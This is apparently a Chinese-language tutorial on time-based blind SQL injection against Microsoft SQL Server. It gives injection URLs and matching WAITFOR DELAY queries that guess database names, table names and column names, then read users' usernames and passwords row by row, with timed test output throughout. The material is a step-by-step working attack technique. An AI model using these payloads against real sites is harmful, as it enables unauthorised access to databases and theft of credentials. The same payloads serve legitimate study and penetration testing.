0x01 前言
SQL Server 的延时注入比较离谱,延时代码必须放到 SQL语句的最后面
这就导致了,注入点必须可以闭合代码,并且使用 — 注释掉后面的无用代码
如果没有办法保证 waitfor delay ‘0:0:5’ 在 SQL的最后面,那么本方法就无法使用
0x02 测试数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x03 猜库名
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name() 就是当前连接的数据库
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?id=1‘ IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a
数据库语句: select * from article WHERE id=’1’ IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a’;
# 获取 当前连接的数据库 数据
# 对得情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.064 sec)
# 错误的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.04 sec)
0x04 猜表名
注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段
查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1‘ IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like ‘%article%’) waitfor delay ‘0:0:5’ — a
数据库语句: select * from article WHERE id=’1’ IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like ‘%article%’) waitfor delay ‘0:0:5’ — a’;
# 获取 当前库 1表数据
# 对的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1
) LIKE '%article%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.03 sec)
# 错误的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1
) LIKE '%bbbb%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.05 sec)
# 获取 当前库 2表数据
# 对的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 2
) LIKE '%users%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.05 sec)
# 错误的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 2
) LIKE '%aaaaaaa%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.03 sec)
0x05 猜字段
注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段
查询不同的表可以这样
例如:
table_name=’要查询的表名’
查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1‘ IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1) like ‘%id%’) waitfor delay ‘0:0:5’ — a
数据库语句: select * from article WHERE id=’1’ IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1) like ‘%id%’) waitfor delay ‘0:0:5’ — a’;
# 当前库 users表 字段数据列表
1> SELECT
*
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a;
2> go
+-------------+-------------+
| row_number | column_name |
+-------------+-------------+
| 1 | id |
| 2 | password |
| 3 | username |
+-------------+-------------+
(3 rows affected)
# 获取当前库 users表 第一个字段数据
# 对的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
column_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 1
) LIKE '%id%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.077 sec)
# 错误的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
column_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 1
) LIKE '%aaaaaaaaa%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+---------5+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.003 sec)
# 获取当前库 users表 第二个字段数据
# 对的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
column_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 2
) LIKE '%password%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.05 sec)
# 错误的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
column_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 2
) LIKE '%savasv%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.03 sec)
0x06 猜内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
获取不同得字段数据可以修改 web语句里面得 a.username
例如
user表字段数据为:id, username,password
因为我使用了别名,所以如果想要获取其他得数据可以改成
a.id,a.username,a.password
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1‘ IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1) like ‘%test-user-01%’) waitfor delay ‘0:0:5’ — a
数据库语句: select from article WHERE id=’1’ IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1) like ‘%test-user-01%’) waitfor delay ‘0:0:5’ — a’;
# 查询users表 第一条数据, username 字段数据
# 对的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
a.username
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 1
) LIKE '%test-user-01%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.07 sec)
# 错误的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
a.username
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 1
) LIKE '%aaaaaa%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.07 sec)
# 查询users表 第二条数据, password 字段数据
# 对的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
a.password
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 2
) LIKE '%234567%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.06 sec)
# 错误的情况
1> SELECT
*
FROM
article
WHERE
id = '1'
IF (
(
SELECT
a.password
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 2
) LIKE '%aascacascsac%'
) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.06 sec)